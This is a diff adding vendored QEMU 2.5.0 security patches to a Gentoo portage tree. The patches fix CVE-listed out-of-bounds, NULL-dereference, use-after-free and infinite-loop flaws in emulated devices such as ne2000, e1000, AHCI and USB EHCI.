vmxnet3_update_pm_state(s);
@@ -1627,7 +1637,7 @@ static void vmxnet3_handle_command(VMXNET3State *s, uint64_t cmd)
break;
case VMXNET3_CMD_QUIESCE_DEV:
- VMW_CBPRN("Set: VMXNET3_CMD_QUIESCE_DEV - pause the device");
+ VMW_CBPRN("Set: VMXNET3_CMD_QUIESCE_DEV - deactivate the device");
vmxnet3_deactivate_device(s);
break;
@@ -1741,7 +1751,7 @@ vmxnet3_io_bar1_write(void *opaque,
* shared address only after we get the high part
*/
if (val == 0) {
- s->device_active = false;
+ vmxnet3_deactivate_device(s);
}
s->temp_shared_guest_driver_memory = val;
s->drv_shmem = 0;
@@ -2021,9 +2031,7 @@ static bool vmxnet3_peer_has_vnet_hdr(VMXNET3State *s)
static void vmxnet3_net_uninit(VMXNET3State *s)
{
g_free(s->mcast_list);
- vmxnet_tx_pkt_reset(s->tx_pkt);
- vmxnet_tx_pkt_uninit(s->tx_pkt);
- vmxnet_rx_pkt_uninit(s->rx_pkt);
+ vmxnet3_deactivate_device(s);
qemu_del_nic(s->nic);
}
--
2.6.2

35
sdk_container/src/third_party/portage-stable/app-emulation/qemu/files/qemu-2.5.0-CVE-2015-8613.patch vendored Normal file
View File

@ -0,0 +1,35 @@
From 36fef36b91f7ec0435215860f1458b5342ce2811 Mon Sep 17 00:00:00 2001
From: P J P <ppandit@redhat.com>
Date: Mon, 21 Dec 2015 15:13:13 +0530
Subject: [PATCH] scsi: initialise info object with appropriate size
While processing controller 'CTRL_GET_INFO' command, the routine
'megasas_ctrl_get_info' overflows the '&info' object size. Use its
appropriate size to null initialise it.
Reported-by: Qinghao Tang <luodalongde@gmail.com>
Signed-off-by: Prasad J Pandit <pjp@fedoraproject.org>
Message-Id: <alpine.LFD.2.20.1512211501420.22471@wniryva>
Cc: qemu-stable@nongnu.org
Signed-off-by: Paolo Bonzini <pbonzini@redhat.com>
Signed-off-by: P J P <ppandit@redhat.com>
---
hw/scsi/megasas.c | 2 +-
1 file changed, 1 insertion(+), 1 deletion(-)
diff --git a/hw/scsi/megasas.c b/hw/scsi/megasas.c
index d7dc667..576f56c 100644
--- a/hw/scsi/megasas.c
+++ b/hw/scsi/megasas.c
@@ -718,7 +718,7 @@ static int megasas_ctrl_get_info(MegasasState *s, MegasasCmd *cmd)
BusChild *kid;
int num_pd_disks = 0;
- memset(&info, 0x0, cmd->iov_size);
+ memset(&info, 0x0, dcmd_size);
if (cmd->iov_size < dcmd_size) {
trace_megasas_dcmd_invalid_xfer_len(cmd->index, cmd->iov_size,
dcmd_size);
--
2.7.4

121
sdk_container/src/third_party/portage-stable/app-emulation/qemu/files/qemu-2.5.0-CVE-2015-8619.patch vendored Normal file
View File

@ -0,0 +1,121 @@
From 64ffbe04eaafebf4045a3ace52a360c14959d196 Mon Sep 17 00:00:00 2001
From: Wolfgang Bumiller <w.bumiller@proxmox.com>
Date: Wed, 13 Jan 2016 09:09:58 +0100
Subject: [PATCH] hmp: fix sendkey out of bounds write (CVE-2015-8619)
When processing 'sendkey' command, hmp_sendkey routine null
terminates the 'keyname_buf' array. This results in an OOB
write issue, if 'keyname_len' was to fall outside of
'keyname_buf' array.
Since the keyname's length is known the keyname_buf can be
removed altogether by adding a length parameter to
index_from_key() and using it for the error output as well.
Reported-by: Ling Liu <liuling-it@360.cn>
Signed-off-by: Wolfgang Bumiller <w.bumiller@proxmox.com>
Message-Id: <20160113080958.GA18934@olga>
[Comparison with "<" dumbed down, test for junk after strtoul()
tweaked]
Signed-off-by: Markus Armbruster <armbru@redhat.com>
---
hmp.c | 18 ++++++++----------
include/ui/console.h | 2 +-
ui/input-legacy.c | 5 +++--
3 files changed, 12 insertions(+), 13 deletions(-)
diff --git a/hmp.c b/hmp.c
index 54f2620..9c571f5 100644
--- a/hmp.c
+++ b/hmp.c
@@ -1731,21 +1731,18 @@ void hmp_sendkey(Monitor *mon, const QDict *qdict)
int has_hold_time = qdict_haskey(qdict, "hold-time");
int hold_time = qdict_get_try_int(qdict, "hold-time", -1);
Error *err = NULL;
- char keyname_buf[16];
char *separator;
int keyname_len;
while (1) {
separator = strchr(keys, '-');
keyname_len = separator ? separator - keys : strlen(keys);
- pstrcpy(keyname_buf, sizeof(keyname_buf), keys);
/* Be compatible with old interface, convert user inputted "<" */
- if (!strncmp(keyname_buf, "<", 1) && keyname_len == 1) {
- pstrcpy(keyname_buf, sizeof(keyname_buf), "less");
+ if (keys[0] == '<' && keyname_len == 1) {
+ keys = "less";
keyname_len = 4;
}
- keyname_buf[keyname_len] = 0;
keylist = g_malloc0(sizeof(*keylist));
keylist->value = g_malloc0(sizeof(*keylist->value));
@@ -1758,16 +1755,17 @@ void hmp_sendkey(Monitor *mon, const QDict *qdict)
}
tmp = keylist;
- if (strstart(keyname_buf, "0x", NULL)) {
+ if (strstart(keys, "0x", NULL)) {
char *endp;
- int value = strtoul(keyname_buf, &endp, 0);
- if (*endp != '\0') {
+ int value = strtoul(keys, &endp, 0);
+ assert(endp <= keys + keyname_len);
+ if (endp != keys + keyname_len) {
goto err_out;
}
keylist->value->type = KEY_VALUE_KIND_NUMBER;
keylist->value->u.number = value;
} else {
- int idx = index_from_key(keyname_buf);
+ int idx = index_from_key(keys, keyname_len);
if (idx == Q_KEY_CODE_MAX) {
goto err_out;
}
@@ -1789,7 +1787,7 @@ out:
return;
err_out:
- monitor_printf(mon, "invalid parameter: %s\n", keyname_buf);
+ monitor_printf(mon, "invalid parameter: %.*s\n", keyname_len, keys);
goto out;
}
diff --git a/include/ui/console.h b/include/ui/console.h
index adac36d..116bc2b 100644
--- a/include/ui/console.h
+++ b/include/ui/console.h
@@ -448,7 +448,7 @@ static inline int vnc_display_pw_expire(const char *id, time_t expires)
void curses_display_init(DisplayState *ds, int full_screen);
/* input.c */
-int index_from_key(const char *key);
+int index_from_key(const char *key, size_t key_length);
/* gtk.c */
void early_gtk_display_init(int opengl);
diff --git a/ui/input-legacy.c b/ui/input-legacy.c
index 35dfc27..3454055 100644
--- a/ui/input-legacy.c
+++ b/ui/input-legacy.c
@@ -57,12 +57,13 @@ struct QEMUPutLEDEntry {
static QTAILQ_HEAD(, QEMUPutLEDEntry) led_handlers =
QTAILQ_HEAD_INITIALIZER(led_handlers);
-int index_from_key(const char *key)
+int index_from_key(const char *key, size_t key_length)
{
int i;
for (i = 0; QKeyCode_lookup[i] != NULL; i++) {
- if (!strcmp(key, QKeyCode_lookup[i])) {
+ if (!strncmp(key, QKeyCode_lookup[i], key_length) &&
+ !QKeyCode_lookup[i][key_length]) {
break;
}
}
--
2.7.4

49
sdk_container/src/third_party/portage-stable/app-emulation/qemu/files/qemu-2.5.0-CVE-2015-8701.patch vendored Normal file
View File

@ -0,0 +1,49 @@
https://bugs.gentoo.org/570110
From 007cd223de527b5f41278f2d886c1a4beb3e67aa Mon Sep 17 00:00:00 2001
From: Prasad J Pandit <pjp@fedoraproject.org>
Date: Mon, 28 Dec 2015 16:24:08 +0530
Subject: [PATCH] net: rocker: fix an incorrect array bounds check
While processing transmit(tx) descriptors in 'tx_consume' routine
the switch emulator suffers from an off-by-one error, if a
descriptor was to have more than allowed(ROCKER_TX_FRAGS_MAX=16)
fragments. Fix an incorrect bounds check to avoid it.
Reported-by: Qinghao Tang <luodalongde@gmail.com>
Cc: qemu-stable@nongnu.org
Signed-off-by: Prasad J Pandit <pjp@fedoraproject.org>
Signed-off-by: Jason Wang <jasowang@redhat.com>
---
hw/net/rocker/rocker.c | 8 ++++----
1 file changed, 4 insertions(+), 4 deletions(-)
diff --git a/hw/net/rocker/rocker.c b/hw/net/rocker/rocker.c
index c57f1a6..2e77e50 100644
--- a/hw/net/rocker/rocker.c
+++ b/hw/net/rocker/rocker.c
@@ -232,6 +232,9 @@ static int tx_consume(Rocker *r, DescInfo *info)
frag_addr = rocker_tlv_get_le64(tlvs[ROCKER_TLV_TX_FRAG_ATTR_ADDR]);
frag_len = rocker_tlv_get_le16(tlvs[ROCKER_TLV_TX_FRAG_ATTR_LEN]);
+ if (iovcnt >= ROCKER_TX_FRAGS_MAX) {
+ goto err_too_many_frags;
+ }
iov[iovcnt].iov_len = frag_len;
iov[iovcnt].iov_base = g_malloc(frag_len);
if (!iov[iovcnt].iov_base) {
@@ -244,10 +247,7 @@ static int tx_consume(Rocker *r, DescInfo *info)
err = -ROCKER_ENXIO;
goto err_bad_io;
}
-
- if (++iovcnt > ROCKER_TX_FRAGS_MAX) {
- goto err_too_many_frags;
- }
+ iovcnt++;
}
if (iovcnt) {
--
2.6.2

50
sdk_container/src/third_party/portage-stable/app-emulation/qemu/files/qemu-2.5.0-CVE-2015-8743.patch vendored Normal file
View File

@ -0,0 +1,50 @@
https://bugs.gentoo.org/570988
From aa7f9966dfdff500bbbf1956d9e115b1fa8987a6 Mon Sep 17 00:00:00 2001
From: Prasad J Pandit <pjp@fedoraproject.org>
Date: Thu, 31 Dec 2015 17:05:27 +0530
Subject: [PATCH] net: ne2000: fix bounds check in ioport operations
While doing ioport r/w operations, ne2000 device emulation suffers
from OOB r/w errors. Update respective array bounds check to avoid
OOB access.
Reported-by: Ling Liu <liuling-it@360.cn>
Cc: qemu-stable@nongnu.org
Signed-off-by: Prasad J Pandit <pjp@fedoraproject.org>
Signed-off-by: Jason Wang <jasowang@redhat.com>
---
hw/net/ne2000.c | 10 ++++++----
1 file changed, 6 insertions(+), 4 deletions(-)
diff --git a/hw/net/ne2000.c b/hw/net/ne2000.c
index 010f9ef..a3dffff 100644
--- a/hw/net/ne2000.c
+++ b/hw/net/ne2000.c
@@ -467,8 +467,9 @@ static inline void ne2000_mem_writel(NE2000State *s, uint32_t addr,
uint32_t val)
{
addr &= ~1; /* XXX: check exact behaviour if not even */
- if (addr < 32 ||
- (addr >= NE2000_PMEM_START && addr < NE2000_MEM_SIZE)) {
+ if (addr < 32
+ || (addr >= NE2000_PMEM_START
+ && addr + sizeof(uint32_t) <= NE2000_MEM_SIZE)) {
stl_le_p(s->mem + addr, val);
}
}
@@ -497,8 +498,9 @@ static inline uint32_t ne2000_mem_readw(NE2000State *s, uint32_t addr)
static inline uint32_t ne2000_mem_readl(NE2000State *s, uint32_t addr)
{
addr &= ~1; /* XXX: check exact behaviour if not even */
- if (addr < 32 ||
- (addr >= NE2000_PMEM_START && addr < NE2000_MEM_SIZE)) {
+ if (addr < 32
+ || (addr >= NE2000_PMEM_START
+ && addr + sizeof(uint32_t) <= NE2000_MEM_SIZE)) {
return ldl_le_p(s->mem + addr);
} else {
return 0xffffffff;
--
2.6.2

41
sdk_container/src/third_party/portage-stable/app-emulation/qemu/files/qemu-2.5.0-CVE-2016-1568.patch vendored Normal file
View File

@ -0,0 +1,41 @@
https://bugs.gentoo.org/571566
From 4ab0359a8ae182a7ac5c99609667273167703fab Mon Sep 17 00:00:00 2001
From: Prasad J Pandit <pjp@fedoraproject.org>
Date: Mon, 11 Jan 2016 14:10:42 -0500
Subject: [PATCH] ide: ahci: reset ncq object to unused on error
When processing NCQ commands, AHCI device emulation prepares a
NCQ transfer object; To which an aio control block(aiocb) object
is assigned in 'execute_ncq_command'. In case, when the NCQ
command is invalid, the 'aiocb' object is not assigned, and NCQ
transfer object is left as 'used'. This leads to a use after
free kind of error in 'bdrv_aio_cancel_async' via 'ahci_reset_port'.
Reset NCQ transfer object to 'unused' to avoid it.
[Maintainer edit: s/ACHI/AHCI/ in the commit message. --js]
Reported-by: Qinghao Tang <luodalongde@gmail.com>
Signed-off-by: Prasad J Pandit <pjp@fedoraproject.org>
Reviewed-by: John Snow <jsnow@redhat.com>
Message-id: 1452282511-4116-1-git-send-email-ppandit@redhat.com
Signed-off-by: John Snow <jsnow@redhat.com>
---
hw/ide/ahci.c | 1 +
1 file changed, 1 insertion(+)
diff --git a/hw/ide/ahci.c b/hw/ide/ahci.c
index dd1912e..17f1cbd 100644
--- a/hw/ide/ahci.c
+++ b/hw/ide/ahci.c
@@ -910,6 +910,7 @@ static void ncq_err(NCQTransferState *ncq_tfs)
ide_state->error = ABRT_ERR;
ide_state->status = READY_STAT | ERR_STAT;
ncq_tfs->drive->port_regs.scr_err |= (1 << ncq_tfs->tag);
+ ncq_tfs->used = 0;
}
static void ncq_finish(NCQTransferState *ncq_tfs)
--
2.6.2

58
sdk_container/src/third_party/portage-stable/app-emulation/qemu/files/qemu-2.5.0-CVE-2016-1714.patch vendored Normal file
View File

@ -0,0 +1,58 @@
From 66f8fd9dda312191b78d2a2ba2848bcee76127a2 Mon Sep 17 00:00:00 2001
From: "Gabriel L. Somlo" <somlo@cmu.edu>
Date: Thu, 5 Nov 2015 09:32:50 -0500
Subject: [PATCH] fw_cfg: avoid calculating invalid current entry pointer
MIME-Version: 1.0
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit
When calculating a pointer to the currently selected fw_cfg item, the
following is used:
FWCfgEntry *e = &s->entries[arch][s->cur_entry & FW_CFG_ENTRY_MASK];
When s->cur_entry is FW_CFG_INVALID, we are calculating the address of
a non-existent element in s->entries[arch][...], which is undefined.
This patch ensures the resulting entry pointer is set to NULL whenever
s->cur_entry is FW_CFG_INVALID.
Reported-by: Laszlo Ersek <lersek@redhat.com>
Reviewed-by: Laszlo Ersek <lersek@redhat.com>
Signed-off-by: Gabriel Somlo <somlo@cmu.edu>
Message-id: 1446733972-1602-5-git-send-email-somlo@cmu.edu
Cc: Marc Marí <markmb@redhat.com>
Signed-off-by: Gabriel Somlo <somlo@cmu.edu>
Reviewed-by: Laszlo Ersek <lersek@redhat.com>
Signed-off-by: Gerd Hoffmann <kraxel@redhat.com>
---
hw/nvram/fw_cfg.c | 6 ++++--
1 file changed, 4 insertions(+), 2 deletions(-)
diff --git a/hw/nvram/fw_cfg.c b/hw/nvram/fw_cfg.c
index c2d3a0a..046fa74 100644
--- a/hw/nvram/fw_cfg.c
+++ b/hw/nvram/fw_cfg.c
@@ -277,7 +277,8 @@ static int fw_cfg_select(FWCfgState *s, uint16_t key)
static uint8_t fw_cfg_read(FWCfgState *s)
{
int arch = !!(s->cur_entry & FW_CFG_ARCH_LOCAL);
- FWCfgEntry *e = &s->entries[arch][s->cur_entry & FW_CFG_ENTRY_MASK];
+ FWCfgEntry *e = (s->cur_entry == FW_CFG_INVALID) ? NULL :
+ &s->entries[arch][s->cur_entry & FW_CFG_ENTRY_MASK];
uint8_t ret;
if (s->cur_entry == FW_CFG_INVALID || !e->data || s->cur_offset >= e->len)
@@ -342,7 +343,8 @@ static void fw_cfg_dma_transfer(FWCfgState *s)
}
arch = !!(s->cur_entry & FW_CFG_ARCH_LOCAL);
- e = &s->entries[arch][s->cur_entry & FW_CFG_ENTRY_MASK];
+ e = (s->cur_entry == FW_CFG_INVALID) ? NULL :
+ &s->entries[arch][s->cur_entry & FW_CFG_ENTRY_MASK];
if (dma.control & FW_CFG_DMA_CTL_READ) {
read = 1;
--
2.7.4

65
sdk_container/src/third_party/portage-stable/app-emulation/qemu/files/qemu-2.5.0-CVE-2016-1922.patch vendored Normal file
View File

@ -0,0 +1,65 @@
From 4c1396cb576c9b14425558b73de1584c7a9735d7 Mon Sep 17 00:00:00 2001
From: P J P <ppandit@redhat.com>
Date: Fri, 18 Dec 2015 11:35:07 +0530
Subject: [PATCH] i386: avoid null pointer dereference
Hello,
A null pointer dereference issue was reported by Mr Ling Liu, CC'd here. It
occurs while doing I/O port write operations via hmp interface. In that,
'current_cpu' remains null as it is not called from cpu_exec loop, which
results in the said issue.
Below is a proposed (tested)patch to fix this issue; Does it look okay?
===
From ae88a4947fab9a148cd794f8ad2d812e7f5a1d0f Mon Sep 17 00:00:00 2001
From: Prasad J Pandit <pjp@fedoraproject.org>
Date: Fri, 18 Dec 2015 11:16:07 +0530
Subject: [PATCH] i386: avoid null pointer dereference
When I/O port write operation is called from hmp interface,
'current_cpu' remains null, as it is not called from cpu_exec()
loop. This leads to a null pointer dereference in vapic_write
routine. Add check to avoid it.
Reported-by: Ling Liu <liuling-it@360.cn>
Signed-off-by: Prasad J Pandit <pjp@fedoraproject.org>
Message-Id: <alpine.LFD.2.20.1512181129320.9805@wniryva>
Signed-off-by: Paolo Bonzini <pbonzini@redhat.com>
Signed-off-by: P J P <ppandit@redhat.com>
---
hw/i386/kvmvapic.c | 15 ++++++++++-----
1 file changed, 10 insertions(+), 5 deletions(-)
diff --git a/hw/i386/kvmvapic.c b/hw/i386/kvmvapic.c
index c6d34b2..f0922da 100644
--- a/hw/i386/kvmvapic.c
+++ b/hw/i386/kvmvapic.c
@@ -634,13 +634,18 @@ static int vapic_prepare(VAPICROMState *s)
static void vapic_write(void *opaque, hwaddr addr, uint64_t data,
unsigned int size)
{
- CPUState *cs = current_cpu;
- X86CPU *cpu = X86_CPU(cs);
- CPUX86State *env = &cpu->env;
- hwaddr rom_paddr;
VAPICROMState *s = opaque;
+ X86CPU *cpu;
+ CPUX86State *env;
+ hwaddr rom_paddr;
- cpu_synchronize_state(cs);
+ if (!current_cpu) {
+ return;
+ }
+
+ cpu_synchronize_state(current_cpu);
+ cpu = X86_CPU(current_cpu);
+ env = &cpu->env;
/*
* The VAPIC supports two PIO-based hypercalls, both via port 0x7E.
--
2.7.4

98
sdk_container/src/third_party/portage-stable/app-emulation/qemu/files/qemu-2.5.0-CVE-2016-1981.patch vendored Normal file
View File

@ -0,0 +1,98 @@
From dd793a74882477ca38d49e191110c17dfee51dcc Mon Sep 17 00:00:00 2001
From: Laszlo Ersek <lersek@redhat.com>
Date: Tue, 19 Jan 2016 14:17:20 +0100
Subject: [PATCH] e1000: eliminate infinite loops on out-of-bounds transfer
start
The start_xmit() and e1000_receive_iov() functions implement DMA transfers
iterating over a set of descriptors that the guest's e1000 driver
prepares:
- the TDLEN and RDLEN registers store the total size of the descriptor
area,
- while the TDH and RDH registers store the offset (in whole tx / rx
descriptors) into the area where the transfer is supposed to start.
Each time a descriptor is processed, the TDH and RDH register is bumped
(as appropriate for the transfer direction).
QEMU already contains logic to deal with bogus transfers submitted by the
guest:
- Normally, the transmit case wants to increase TDH from its initial value
to TDT. (TDT is allowed to be numerically smaller than the initial TDH
value; wrapping at or above TDLEN bytes to zero is normal.) The failsafe
that QEMU currently has here is a check against reaching the original
TDH value again -- a complete wraparound, which should never happen.
- In the receive case RDH is increased from its initial value until
"total_size" bytes have been received; preferably in a single step, or
in "s->rxbuf_size" byte steps, if the latter is smaller. However, null
RX descriptors are skipped without receiving data, while RDH is
incremented just the same. QEMU tries to prevent an infinite loop
(processing only null RX descriptors) by detecting whether RDH assumes
its original value during the loop. (Again, wrapping from RDLEN to 0 is
normal.)
What both directions miss is that the guest could program TDLEN and RDLEN
so low, and the initial TDH and RDH so high, that these registers will
immediately be truncated to zero, and then never reassume their initial
values in the loop -- a full wraparound will never occur.
The condition that expresses this is:
xdh_start >= s->mac_reg[XDLEN] / sizeof(desc)
i.e., TDH or RDH start out after the last whole rx or tx descriptor that
fits into the TDLEN or RDLEN sized area.
This condition could be checked before we enter the loops, but
pci_dma_read() / pci_dma_write() knows how to fill in buffers safely for
bogus DMA addresses, so we just extend the existing failsafes with the
above condition.
This is CVE-2016-1981.
Cc: "Michael S. Tsirkin" <mst@redhat.com>
Cc: Petr Matousek <pmatouse@redhat.com>
Cc: Stefano Stabellini <stefano.stabellini@eu.citrix.com>
Cc: Prasad Pandit <ppandit@redhat.com>
Cc: Michael Roth <mdroth@linux.vnet.ibm.com>
Cc: Jason Wang <jasowang@redhat.com>
Cc: qemu-stable@nongnu.org
RHBZ: https://bugzilla.redhat.com/show_bug.cgi?id=1296044
Signed-off-by: Laszlo Ersek <lersek@redhat.com>
Reviewed-by: Jason Wang <jasowang@redhat.com>
Signed-off-by: Jason Wang <jasowang@redhat.com>
---
hw/net/e1000.c | 6 ++++--
1 file changed, 4 insertions(+), 2 deletions(-)
diff --git a/hw/net/e1000.c b/hw/net/e1000.c
index 4eda7a3..0387fa0 100644
--- a/hw/net/e1000.c
+++ b/hw/net/e1000.c
@@ -909,7 +909,8 @@ start_xmit(E1000State *s)
* bogus values to TDT/TDLEN.
* there's nothing too intelligent we could do about this.
*/
- if (s->mac_reg[TDH] == tdh_start) {
+ if (s->mac_reg[TDH] == tdh_start ||
+ tdh_start >= s->mac_reg[TDLEN] / sizeof(desc)) {
DBGOUT(TXERR, "TDH wraparound @%x, TDT %x, TDLEN %x\n",
tdh_start, s->mac_reg[TDT], s->mac_reg[TDLEN]);
break;
@@ -1166,7 +1167,8 @@ e1000_receive_iov(NetClientState *nc, const struct iovec *iov, int iovcnt)
if (++s->mac_reg[RDH] * sizeof(desc) >= s->mac_reg[RDLEN])
s->mac_reg[RDH] = 0;
/* see comment in start_xmit; same here */
- if (s->mac_reg[RDH] == rdh_start) {
+ if (s->mac_reg[RDH] == rdh_start ||
+ rdh_start >= s->mac_reg[RDLEN] / sizeof(desc)) {
DBGOUT(RXERR, "RDH wraparound @%x, RDT %x, RDLEN %x\n",
rdh_start, s->mac_reg[RDT], s->mac_reg[RDLEN]);
set_ics(s, 0, E1000_ICS_RXO);
--
2.7.4

43
sdk_container/src/third_party/portage-stable/app-emulation/qemu/files/qemu-2.5.0-CVE-2016-2197.patch vendored Normal file
View File

@ -0,0 +1,43 @@
From 99b4cb71069f109b79b27bc629fc0cf0886dbc4b Mon Sep 17 00:00:00 2001
From: John Snow <jsnow@redhat.com>
Date: Wed, 10 Feb 2016 13:29:40 -0500
Subject: [PATCH] ahci: Do not unmap NULL addresses
Definitely don't try to unmap a garbage address.
Reported-by: Zuozhi fzz <zuozhi.fzz@alibaba-inc.com>
Signed-off-by: John Snow <jsnow@redhat.com>
Message-id: 1454103689-13042-2-git-send-email-jsnow@redhat.com
---
hw/ide/ahci.c | 8 ++++++++
1 file changed, 8 insertions(+)
diff --git a/hw/ide/ahci.c b/hw/ide/ahci.c
index 7e87b18..3a95dad 100644
--- a/hw/ide/ahci.c
+++ b/hw/ide/ahci.c
@@ -662,6 +662,10 @@ static bool ahci_map_fis_address(AHCIDevice *ad)
static void ahci_unmap_fis_address(AHCIDevice *ad)
{
+ if (ad->res_fis == NULL) {
+ DPRINTF(ad->port_no, "Attempt to unmap NULL FIS address\n");
+ return;
+ }
dma_memory_unmap(ad->hba->as, ad->res_fis, 256,
DMA_DIRECTION_FROM_DEVICE, 256);
ad->res_fis = NULL;
@@ -678,6 +682,10 @@ static bool ahci_map_clb_address(AHCIDevice *ad)
static void ahci_unmap_clb_address(AHCIDevice *ad)
{
+ if (ad->lst == NULL) {
+ DPRINTF(ad->port_no, "Attempt to unmap NULL CLB address\n");
+ return;
+ }
dma_memory_unmap(ad->hba->as, ad->lst, 1024,
DMA_DIRECTION_FROM_DEVICE, 1024);
ad->lst = NULL;
--
2.7.4

46
sdk_container/src/third_party/portage-stable/app-emulation/qemu/files/qemu-2.5.0-CVE-2016-2198.patch vendored Normal file
View File

@ -0,0 +1,46 @@
From dff0367cf66f489aa772320fa2937a8cac1ca30d Mon Sep 17 00:00:00 2001
From: Prasad J Pandit <pjp@fedoraproject.org>
Date: Fri, 29 Jan 2016 18:30:34 +0530
Subject: [PATCH] usb: ehci: add capability mmio write function
USB Ehci emulation supports host controller capability registers.
But its mmio '.write' function was missing, which lead to a null
pointer dereference issue. Add a do nothing 'ehci_caps_write'
definition to avoid it; Do nothing because capability registers
are Read Only(RO).
Reported-by: Zuozhi Fzz <zuozhi.fzz@alibaba-inc.com>
Signed-off-by: Prasad J Pandit <pjp@fedoraproject.org>
Message-id: 1454072434-16045-1-git-send-email-ppandit@redhat.com
Signed-off-by: Gerd Hoffmann <kraxel@redhat.com>
---
hw/usb/hcd-ehci.c | 6 ++++++
1 file changed, 6 insertions(+)
diff --git a/hw/usb/hcd-ehci.c b/hw/usb/hcd-ehci.c
index 1b50601..0f95d0d 100644
--- a/hw/usb/hcd-ehci.c
+++ b/hw/usb/hcd-ehci.c
@@ -895,6 +895,11 @@ static uint64_t ehci_caps_read(void *ptr, hwaddr addr,
return s->caps[addr];
}
+static void ehci_caps_write(void *ptr, hwaddr addr,
+ uint64_t val, unsigned size)
+{
+}
+
static uint64_t ehci_opreg_read(void *ptr, hwaddr addr,
unsigned size)
{
@@ -2315,6 +2320,7 @@ static void ehci_frame_timer(void *opaque)
static const MemoryRegionOps ehci_mmio_caps_ops = {
.read = ehci_caps_read,
+ .write = ehci_caps_write,
.valid.min_access_size = 1,
.valid.max_access_size = 4,
.impl.min_access_size = 1,
--
2.7.4

35
sdk_container/src/third_party/portage-stable/app-emulation/qemu/files/qemu-2.5.0-CVE-2016-2392.patch vendored Normal file
View File

@ -0,0 +1,35 @@
From 80eecda8e5d09c442c24307f340840a5b70ea3b9 Mon Sep 17 00:00:00 2001
From: Prasad J Pandit <pjp@fedoraproject.org>
Date: Thu, 11 Feb 2016 16:31:20 +0530
Subject: [PATCH] usb: check USB configuration descriptor object
When processing remote NDIS control message packets, the USB Net
device emulator checks to see if the USB configuration descriptor
object is of RNDIS type(2). But it does not check if it is null,
which leads to a null dereference error. Add check to avoid it.
Reported-by: Qinghao Tang <luodalongde@gmail.com>
Signed-off-by: Prasad J Pandit <pjp@fedoraproject.org>
Message-id: 1455188480-14688-1-git-send-email-ppandit@redhat.com
Signed-off-by: Gerd Hoffmann <kraxel@redhat.com>
---
hw/usb/dev-network.c | 3 ++-
1 file changed, 2 insertions(+), 1 deletion(-)
diff --git a/hw/usb/dev-network.c b/hw/usb/dev-network.c
index 985a629..5dc4538 100644
--- a/hw/usb/dev-network.c
+++ b/hw/usb/dev-network.c
@@ -654,7 +654,8 @@ typedef struct USBNetState {
static int is_rndis(USBNetState *s)
{
- return s->dev.config->bConfigurationValue == DEV_RNDIS_CONFIG_VALUE;
+ return s->dev.config ?
+ s->dev.config->bConfigurationValue == DEV_RNDIS_CONFIG_VALUE : 0;
}
static int ndis_query(USBNetState *s, uint32_t oid,
--
2.7.4

8
sdk_container/src/third_party/portage-stable/app-emulation/qemu/files/qemu-1.7.0-cflags.patch → sdk_container/src/third_party/portage-stable/app-emulation/qemu/files/qemu-2.5.0-cflags.patch vendored
View File

@ -1,11 +1,13 @@
--- a/configure --- a/configure
+++ b/configure +++ b/configure
@@ -3131,8 +3131,6 @@ fi @@ -4468,10 +4468,6 @@ fi
if test "$gcov" = "yes" ; then if test "$gcov" = "yes" ; then
CFLAGS="-fprofile-arcs -ftest-coverage -g $CFLAGS" CFLAGS="-fprofile-arcs -ftest-coverage -g $CFLAGS"
LDFLAGS="-fprofile-arcs -ftest-coverage $LDFLAGS" LDFLAGS="-fprofile-arcs -ftest-coverage $LDFLAGS"
-elif test "$debug" = "no" ; then -elif test "$fortify_source" = "yes" ; then
- CFLAGS="-O2 -U_FORTIFY_SOURCE -D_FORTIFY_SOURCE=2 $CFLAGS" - CFLAGS="-O2 -U_FORTIFY_SOURCE -D_FORTIFY_SOURCE=2 $CFLAGS"
-elif test "$debug" = "no"; then
- CFLAGS="-O2 $CFLAGS"
fi fi
##########################################

37
sdk_container/src/third_party/portage-stable/app-emulation/qemu/files/qemu-2.5.0-ne2000-reg-check.patch vendored Normal file
View File

@ -0,0 +1,37 @@
From 415ab35a441eca767d033a2702223e785b9d5190 Mon Sep 17 00:00:00 2001
From: Prasad J Pandit <pjp@fedoraproject.org>
Date: Wed, 24 Feb 2016 11:41:33 +0530
Subject: [PATCH] net: ne2000: check ring buffer control registers
Ne2000 NIC uses ring buffer of NE2000_MEM_SIZE(49152)
bytes to process network packets. Registers PSTART & PSTOP
define ring buffer size & location. Setting these registers
to invalid values could lead to infinite loop or OOB r/w
access issues. Add check to avoid it.
Reported-by: Yang Hongke <yanghongke@huawei.com>
Tested-by: Yang Hongke <yanghongke@huawei.com>
Signed-off-by: Prasad J Pandit <pjp@fedoraproject.org>
Signed-off-by: Jason Wang <jasowang@redhat.com>
---
hw/net/ne2000.c | 4 ++++
1 file changed, 4 insertions(+)
diff --git a/hw/net/ne2000.c b/hw/net/ne2000.c
index e408083..f0feaf9 100644
--- a/hw/net/ne2000.c
+++ b/hw/net/ne2000.c
@@ -155,6 +155,10 @@ static int ne2000_buffer_full(NE2000State *s)
{
int avail, index, boundary;
+ if (s->stop <= s->start) {
+ return 1;
+ }
+
index = s->curpag << 8;
boundary = s->boundary << 8;
if (index < boundary)
--
2.7.4

98
sdk_container/src/third_party/portage-stable/app-emulation/qemu/files/qemu-2.5.0-rng-stack-corrupt-0.patch vendored Normal file
View File

@ -0,0 +1,98 @@
From 3c52ddcdc548e7fbe65112d8a7bdc9cd105b4750 Mon Sep 17 00:00:00 2001
From: Ladi Prosek <lprosek@redhat.com>
Date: Thu, 3 Mar 2016 09:37:15 +0100
Subject: [PATCH] rng: remove the unused request cancellation code
rng_backend_cancel_requests had no callers and none of the code
deleted in this commit ever ran.
Signed-off-by: Ladi Prosek <lprosek@redhat.com>
Reviewed-by: Amit Shah <amit.shah@redhat.com>
Message-Id: <1456994238-9585-2-git-send-email-lprosek@redhat.com>
Signed-off-by: Amit Shah <amit.shah@redhat.com>
---
backends/rng-egd.c | 12 ------------
backends/rng.c | 9 ---------
include/sysemu/rng.h | 11 -----------
3 files changed, 32 deletions(-)
diff --git a/backends/rng-egd.c b/backends/rng-egd.c
index 2de5cd5..0b2976a 100644
--- a/backends/rng-egd.c
+++ b/backends/rng-egd.c
@@ -125,17 +125,6 @@ static void rng_egd_free_requests(RngEgd *s)
s->requests = NULL;
}
-static void rng_egd_cancel_requests(RngBackend *b)
-{
- RngEgd *s = RNG_EGD(b);
-
- /* We simply delete the list of pending requests. If there is data in the
- * queue waiting to be read, this is okay, because there will always be
- * more data than we requested originally
- */
- rng_egd_free_requests(s);
-}
-
static void rng_egd_opened(RngBackend *b, Error **errp)
{
RngEgd *s = RNG_EGD(b);
